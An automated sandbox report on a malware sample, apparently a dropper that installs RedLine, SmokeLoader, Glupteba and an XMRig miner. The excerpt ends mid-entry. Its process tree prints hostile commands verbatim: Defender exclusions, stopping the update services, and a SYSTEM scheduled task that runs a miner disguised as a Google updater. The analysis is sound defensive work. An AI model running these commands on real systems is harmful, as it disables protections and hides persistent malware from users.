2023-11-10 14:35:59 UTC	1	IN	Data Raw: 52 2e 65 78 65 2c 44 65 61 64 42 79 44 61 79 6c 69 67 68 74 2d 57 69 6e 36 34 2d 53 68 69 70 70 69 6e 67 2e 65 78 65 2c 50 6f 69 6e 74 42 6c 61 6e 6b 2e 65 78 65 2c 65 6e 6c 69 73 74 65 64 2e 65 78 65 2c 57 6f 72 6c 64 4f 66 54 61 6e 6b 73 2e 65 78 65 2c 53 6f 54 47 61 6d 65 2e 65 78 65 2c 46 69 76 65 4d 5f 62 32 31 38 39 5f 47 54 41 50 72 6f 63 65 73 73 2e 65 78 65 2c 4e 61 72 61 6b 61 42 6c 61 64 65 70 6f 69 6e 74 2e 65 78 65 2c 72 65 38 2e 65 78 65 2c 53 6f 6e 69 63 20 43 6f 6c 6f 72 73 20 2d 20 55 6c 74 69 6d 61 74 65 2e 65 78 65 2c 69 77 36 73 70 36 34 5f 73 68 69 70 2e 65 78 65 2c 52 6f 63 6b 65 74 4c 65 61 67 75 65 2e 65 78 65 2c 43 79 62 65 72 70 75 6e 6b 32 30 37 37 2e 65 78 65 2c 46 69 76 65 4d 5f 47 54 41 50 72 6f 63 65 73 73 2e 65 78 65 2c 52 Data Ascii: R.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,R
2023-11-10 14:35:59 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:34:56
Start date:	10/11/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x880000
File size:	13'188'608 bytes
MD5 hash:	E2982DF7BD07C80FFDD02A7D680B64BC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:34:57
Start date:	10/11/2023
Path:	C:\Users\user\AppData\Local\Temp\InstallSetup5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\InstallSetup5.exe"
Imagebase:	0x400000
File size:	2'671'908 bytes
MD5 hash:	BC3354A4CD405A2F2F98E8B343A7D08D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 50%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	15:34:58
Start date:	10/11/2023
Path:	C:\Users\user\AppData\Local\Temp\toolspub2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Imagebase:	0x400000
File size:	270'848 bytes
MD5 hash:	DCBD05276D11111F2DD2A7EDF52E3386
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.2155575698.0000000000952000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:34:58
Start date:	10/11/2023
Path:	C:\Users\user\AppData\Local\Temp\Broom.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\Broom.exe
Imagebase:	0x400000
File size:	5'515'264 bytes
MD5 hash:	00E93456AA5BCF9F60F84B0C0760A212
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.2106864524.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\Broom.exe, Author: Joe Security
Antivirus matches:	Detection: 21%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	15:34:58
Start date:	10/11/2023
Path:	C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
Imagebase:	0x400000
File size:	4'360'056 bytes
MD5 hash:	2A92DBDA3DF9502DEF5E1C9009950699
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	15:34:59
Start date:	10/11/2023
Path:	C:\Users\user\AppData\Local\Temp\latestX.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\latestX.exe"
Imagebase:	0x7ff7db320000
File size:	5'874'968 bytes
MD5 hash:	BAE29E49E8190BFBBF0D77FFAB8DE59D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:35:00
Start date:	10/11/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:35:01
Start date:	10/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:35:02
Start date:	10/11/2023
Path:	C:\Users\user\AppData\Local\Temp\toolspub2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Imagebase:	0x400000
File size:	270'848 bytes
MD5 hash:	DCBD05276D11111F2DD2A7EDF52E3386
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2281261302.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2281261302.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2281176476.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2281176476.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:35:05
Start date:	10/11/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -nologo -noprofile
Imagebase:	0xc90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:35:05
Start date:	10/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:35:07
Start date:	10/11/2023
Path:	C:\Windows\servicing\TrustedInstaller.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\servicing\TrustedInstaller.exe
Imagebase:	0x7ff765610000
File size:	192'336 bytes
MD5 hash:	D098F2FC042FBF6879D47E3A86FBB4A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:35:07
Start date:	10/11/2023
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	15:35:07
Start date:	10/11/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff7f6ec0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:35:08
Start date:	10/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:35:08
Start date:	10/11/2023
Path:	C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
Imagebase:	0x400000
File size:	4'360'056 bytes
MD5 hash:	2A92DBDA3DF9502DEF5E1C9009950699
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.4575750686.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.4575377290.0000000002B16000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000011.00000003.2270531809.0000000003C42000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000011.00000002.4575750686.0000000003353000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	15:35:08
Start date:	10/11/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff78fb20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	15:35:08
Start date:	10/11/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff609140000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	15:35:08
Start date:	10/11/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff78fb20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	15:35:08
Start date:	10/11/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff78fb20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	15:35:08
Start date:	10/11/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff78fb20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	15:35:08
Start date:	10/11/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff78fb20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	15:35:08
Start date:	10/11/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff7f6ec0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	15:35:08
Start date:	10/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	15:35:08
Start date:	10/11/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	15:35:08
Start date:	10/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	15:35:08
Start date:	10/11/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff68ea30000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	15:35:09
Start date:	10/11/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff68ea30000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	15:35:09
Start date:	10/11/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff68ea30000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	15:35:09
Start date:	10/11/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff68ea30000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	15:35:15
Start date:	10/11/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -nologo -noprofile
Imagebase:	0xc90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	15:35:15
Start date:	10/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	15:35:31
Start date:	10/11/2023
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
Imagebase:	0x7ff72fde0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	15:35:31
Start date:	10/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7934f0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	15:35:31
Start date:	10/11/2023
Path:	C:\Program Files\Google\Chrome\updater.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Google\Chrome\updater.exe
Imagebase:	0x7ff7fa990000
File size:	5'874'968 bytes
MD5 hash:	BAE29E49E8190BFBBF0D77FFAB8DE59D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.2684843852.00007FF7FA9B0000.00000004.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000027.00000002.2684843852.00007FF7FA9B0000.00000004.00000001.01000000.0000000E.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	15:35:31
Start date:	10/11/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	15:35:31
Start date:	10/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	15:35:33
Start date:	10/11/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff7f6ec0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 2404, Parent PID: 5944

General

Target ID:	43
Start time:	15:35:33
Start date:	10/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	15:35:33
Start date:	10/11/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff78fb20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	15:35:33
Start date:	10/11/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff78fb20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	15:35:34
Start date:	10/11/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff78fb20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	15:35:34
Start date:	10/11/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff78fb20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	15:35:34
Start date:	10/11/2023
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff78fb20000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	15:35:34
Start date:	10/11/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff7f6ec0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5336, Parent PID: 5332

General

Target ID:	51
Start time:	15:35:34
Start date:	10/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	15:35:34
Start date:	10/11/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Has exited:	true

Analysis Process: powercfg.exePID: 6404, Parent PID: 5332

General

Target ID:	53
Start time:	15:35:34
Start date:	10/11/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff68ea30000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	15:35:34
Start date:	10/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	15:35:34
Start date:	10/11/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff68ea30000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	15:35:35
Start date:	10/11/2023
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
